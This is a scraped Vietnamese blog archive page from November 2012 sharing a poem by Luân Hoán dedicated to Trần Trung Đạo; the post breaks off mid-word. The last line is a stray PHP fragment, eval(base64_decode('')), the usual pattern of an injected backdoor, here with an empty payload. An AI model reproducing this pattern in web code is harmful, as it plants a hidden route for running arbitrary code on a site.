Archive for November 15th, 2012

Thơ Luân Hoán: Trần Trung Đạo

Thơ Luân Hoán: Trần Trung Đạo

Buổi sáng, nhận bài thơ anh Luân Hoán tặng, gởi ra đây chia sẻ với anh chi và các bạn, không phải khoe khoang nhưng vì thơ Luân Hoán đậm đà tình nghĩa, rất thơ và cũng rất vui. Bức hình của hai anh em chụp chung ở Montreal năm ngoái. Trầ

11.15.2012 | Thơ |

3 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>